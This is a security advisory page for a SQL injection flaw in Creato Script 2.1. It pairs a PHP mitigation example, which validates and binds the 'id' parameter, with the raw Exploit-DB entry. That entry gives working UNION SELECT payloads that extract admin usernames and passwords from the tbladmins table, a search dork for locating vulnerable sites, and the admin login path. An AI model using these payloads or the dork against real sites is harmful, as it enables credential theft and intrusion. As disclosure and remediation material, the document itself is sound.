Vendor: Creato Script
By: Mr.P3rfekT
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Creato Script
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: N/A
Related CWE: N/A
CPE: a:creato:creato_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux

Creato Script SQL Injection Vulnerability

A SQL injection vulnerability was discovered in the Creato Script software. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the 'mainpage.php' file. This can allow the attacker to gain access to the admin username and password.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.
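
The two mitigations above, shown as an added example (this is not Creato Script's code and not the advisory author's): the 'id' value is validated as a positive integer, then bound in a prepared statement. The `pages` table, its columns and the function names are assumptions; only the `id` parameter and `tbladmins` come from the advisory. It needs the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database so the example runs offline.
function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)'); // hypothetical
    $pdo->exec('CREATE TABLE tbladmins (adminusername TEXT, adminpassword TEXT)');
    $pdo->exec("INSERT INTO pages VALUES (6, 'About', 'Constructed sample row')");
    $pdo->exec("INSERT INTO tbladmins VALUES ('admin', 'constructed-hash')");
    return $pdo;
}

// Layer 1: input validation. `id` must be a positive integer and nothing else.
function parse_page_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Layer 2: parameterized query. The value is bound, never concatenated into SQL.
function load_page(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = demo_db();
$inputs = [
    '6',                                                                        // valid id
    '-6 union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--', // string from the advisory
    '6abc',                                                                     // trailing junk
    '',                                                                         // missing value
];
foreach ($inputs as $raw) {
    $id = parse_page_id($raw);
    if ($id === null) {
        echo "rejected (400): " . var_export($raw, true) . "\n";
        continue;
    }
    $page = load_page($pdo, $id);
    echo $page === null ? "not found (404): $id\n" : "ok: {$page['title']}\n";
}
```

Only the first input reaches the database; the other three are rejected by the integer check, and even a value that passed would be bound as a single integer rather than parsed as SQL.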

Exploit-DB raw data:

# Title:  Creato Script SQL Injection Vulnerability
# Version: 2.1
# Author: Mr.P3rfekT
# Software Site:  http://www.creato.biz 
# Tested on Linux
# CVE : N/A
   
############### Founded By Mr.P3rfekT ###############
# Dork : " created by creato.biz "


# Helllo Allz.
   
   
# Exploit :
   
http://[site]/mainpage.php?id={SQLi}



# Poc Username:

union select 1,adminusername,3,4,5,6,7,8,9,10,11,12 from tbladmins--


# Poc Password:

# union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--


# Demo:

 http://[site]/mainpage.php?id=-6 union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
 
# Admin Login


# http://[site]/admun/login.php

# ./done.
  
   
####################################################################
   
MaiL :R4p@hotmail.com
  
Greeetz To : Sinaritx,HcJ,Mr.Black,D3ViL H4CK3R,Uzm4n,Nani17,Cyb3r-DeViL,www.v4-team.com,www.arab-exploit.com Cr3w,www.Barcelonasy.com & All Who Known Me
  
   
###############################################